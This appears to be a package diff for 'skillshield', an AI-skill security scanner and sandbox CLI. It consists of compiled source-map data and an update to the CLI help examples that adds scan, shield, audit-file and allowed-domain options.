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"}
package/dist/cli/index.js CHANGED
@@ -38,13 +38,15 @@ program
38
38
  .on('--help', () => {
39
39
  console.log(chalk.cyan(ASCII_BANNER));
40
40
  console.log(chalk.bold('\nExamples:\n'));
41
- console.log(chalk.gray(' $ skillshield scan ./my-skill.md # Security audit'));
41
+ console.log(chalk.gray(' $ skillshield scan ./my-skill.md # Security audit (72+ patterns)'));
42
42
  console.log(chalk.gray(' $ skillshield badge ./my-skill.md # Generate security badge'));
43
- console.log(chalk.gray(' $ skillshield run my-skill --input "Your prompt" # Execute in sandbox'));
43
+ console.log(chalk.gray(' $ skillshield run my-skill --input "Hello" # Scan + Shield + Execute'));
44
+ console.log(chalk.gray(' $ skillshield run my-skill --no-shield # Scan only, no enforcement'));
45
+ console.log(chalk.gray(' $ skillshield run my-skill --audit-file trail.json # Save cryptographic audit'));
46
+ console.log(chalk.gray(' $ skillshield run my-skill --allow-domains api.openai.com,github.com'));
44
47
  console.log(chalk.gray(' $ skillshield init # Interactive setup'));
45
48
  console.log(chalk.gray(' $ skillshield search "data analysis" # Find skills'));
46
49
  console.log(chalk.gray(' $ skillshield install skill-name # Install from hub'));
47
- console.log(chalk.gray(' $ skillshield list # List installed'));
48
50
  });
49
51
  // Add subcommands
50
52
  init(program);
package/dist/cli/index.js.map CHANGED
@@ -1 +1 @@
1
- {"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/cli/index.ts"],"names":[],"mappings":";AAEA,OAAO,KAAK,MAAM,OAAO,CAAC;AAC1B,OAAO,EAAE,OAAO,EAAE,MAAM,WAAW,CAAC;AACpC,OAAO,EAAE,YAAY,EAAE,MAAM,IAAI,CAAC;AAClC,OAAO,EAAE,OAAO,EAAE,MAAM,MAAM,CAAC;AAC/B,OAAO,EAAE,aAAa,EAAE,MAAM,KAAK,CAAC;AACpC,OAAO,EAAE,IAAI,EAAE,MAAM,oBAAoB,CAAC;AAC1C,OAAO,EAAE,GAAG,EAAE,MAAM,mBAAmB,CAAC;AACxC,OAAO,EAAE,IAAI,EAAE,MAAM,oBAAoB,CAAC;AAC1C,OAAO,EAAE,MAAM,EAAE,MAAM,sBAAsB,CAAC;AAC9C,OAAO,EAAE,OAAO,EAAE,MAAM,uBAAuB,CAAC;AAChD,OAAO,EAAE,IAAI,EAAE,MAAM,oBAAoB,CAAC;AAC1C,OAAO,EAAE,MAAM,EAAE,MAAM,sBAAsB,CAAC;AAC9C,OAAO,EAAE,MAAM,EAAE,MAAM,sBAAsB,CAAC;AAC9C,OAAO,EAAE,KAAK,EAAE,MAAM,qBAAqB,CAAC;AAE5C,MAAM,SAAS,GAAG,aAAa,CAAC,IAAI,GAAG,CAAC,GAAG,EAAE,MAAM,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,CAAC;AAC/D,MAAM,eAAe,GAAG,OAAO,CAAC,SAAS,EAAE,oBAAoB,CAAC,CAAC;AACjE,MAAM,WAAW,GAAG,IAAI,CAAC,KAAK,CAAC,YAAY,CAAC,eAAe,EAAE,OAAO,CAAC,CAAC,CAAC;AAEvE,MAAM,YAAY,GAAG;;;;;;;;0CAQqB,WAAW,CAAC,OAAO;CAC5D,CAAC;AAEF,OAAO;KACJ,IAAI,CAAC,aAAa,CAAC;KACnB,WAAW,CAAC,KAAK,CAAC,IAAI,CAAC,gEAAgE,CAAC,CAAC;KACzF,OAAO,CAAC,WAAW,CAAC,OAAO,EAAE,eAAe,CAAC;KAC7C,MAAM,CACL,iBAAiB,EACjB,8CAA8C,EAC9C,OAAO,CAAC,GAAG,CAAC,cAAc,IAAI,mBAAmB,CAClD;KACA,MAAM,CACL,uBAAuB,EACvB,0CAA0C,EAC1C,OAAO,CAAC,GAAG,CAAC,iBAAiB,IAAI,WAAW,CAC7C;KACA,MAAM,CACL,mBAAmB,EACnB,kCAAkC,EAClC,OAAO,CAAC,GAAG,CAAC,iBAAiB,IAAI,IAAI,CACtC;KACA,MAAM,CAAC,eAAe,EAAE,gBAAgB,CAAC;KACzC,MAAM,CAAC,QAAQ,EAAE,gBAAgB,CAAC;KAClC,EAAE